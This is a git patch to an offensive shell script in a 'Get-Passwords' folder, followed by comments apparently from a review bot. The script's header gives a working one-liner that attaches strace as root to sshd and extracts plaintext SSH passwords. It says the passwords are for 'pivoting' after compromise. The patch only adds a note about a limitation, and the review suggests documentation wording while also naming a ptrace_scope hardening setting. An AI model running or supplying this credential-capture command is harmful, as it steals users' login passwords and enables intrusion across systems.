From b4e76815de6705a07d78d56b6a2ecc4f5f5173b0 Mon Sep 17 00:00:00 2001
From: dade <0xdade@users.noreply.github.com>
Date: Sat, 22 Jul 2017 20:34:08 -0700
Subject: [PATCH] Update sshstrace.sh

---
 Get-Passwords/sshstrace.sh | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh
index 317a572..fa846d9 100644
--- a/Get-Passwords/sshstrace.sh
+++ b/Get-Passwords/sshstrace.sh
@@ -3,6 +3,7 @@
 # In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
 # Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
 # I think I fixed the random char padding problem, but now perl is required
+# Turns out it also doesn't work if the password is entirely numbers.
 # strace -s 128 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -oP 'write\(4, "\\0\\0\\0\\[\d]*[^\\]{2,}[^\\0]"' | perl -pe 's/write\(4, "\\0\\0\\0\\([\d]+|[\w])(.*)"/\2/g'
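Review bot: The added comment line is ambiguous as documentation: "it" and "also" have no referent in the visible header, since the line before describes a problem as fixed rather than listing a limitation. A self-contained wording such as `# Known limitation: the capture fails when the password consists only of digits.` would read correctly on its own. The header block starts above this hunk, but the visible part names only root and perl as requirements and never states that the script depends on being allowed to ptrace-attach to the sshd PID. A line like `# Requires ptrace attach to sshd; blocked when kernel.yama.ptrace_scope=3` would document that precondition, and it also names the control a host owner can set to stop this kind of capture.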